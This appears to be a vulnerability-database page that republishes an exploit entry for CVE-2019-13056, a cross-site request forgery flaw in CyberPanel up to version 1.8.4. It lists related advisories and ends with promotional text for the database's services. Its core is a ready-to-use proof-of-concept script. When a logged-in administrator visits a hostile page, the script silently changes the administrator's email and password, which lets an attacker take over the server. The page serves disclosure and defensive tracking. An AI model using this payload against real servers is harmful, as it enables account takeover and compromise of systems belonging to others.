| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CyberPanel 1.8.4 - Cross-Site Request Forgery Vulnerability | 2 Jul 201900:00 | – | zdt | |
| CyberPanel Cross-Site Request Forgery Vulnerability | 2 Jul 201900:00 | – | cnvd | |
| CVE-2019-13056 | 2 Jul 201915:18 | – | cve | |
| CVE-2019-13056 | 2 Jul 201915:18 | – | cvelist | |
| EUVD-2019-4616 | 7 Oct 202500:30 | – | euvd | |
| CyberPanel 1.8.4 - Cross-Site Request Forgery | 1 Jul 201900:00 | – | exploitpack | |
| CVE-2019-13056 | 2 Jul 201916:15 | – | nvd | |
| CyberPanel 1.8.4 Cross Site Request Forgery | 1 Jul 201900:00 | – | packetstorm | |
| Cross site request forgery (csrf) | 2 Jul 201916:15 | – | prion | |
| CVE-2019-13056 | 22 May 202508:09 | – | redhatcve |
# Title: CyberPanel Administrator Account Takeover <= v1.8.4
# Date: 30.06.2019
# Author: Bilgi Birikim Sistemleri
# Vendor Homepage: https://cyberpanel.net/
# Version: Up to v1.8.4.
# CVE: CVE-2019-13056
# [email protected] & bilgibirikim.com
# Description:
# Attacker can edit administrator's credentials like email, password.
# Then, access the administration panel and takeover the server.
# A CSRF vulnerability.
# How to Reproduce:
# Attacker will create a website,
# CyberPanel administrator will visit that website,
# Administrator's e-mail and password will be changed automatically.
# PoC:
<script>
fetch('https://SERVERIP:8090/users/saveModifications', {method: 'POST', credentials: 'include', headers: {'Content-Type': 'text/plain'}, body: '{"accountUsername":"admin","firstName":"CSRF","lastName":"Vulnerable","email":"[email protected]","password":"attackerspassword"}'});
</script>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation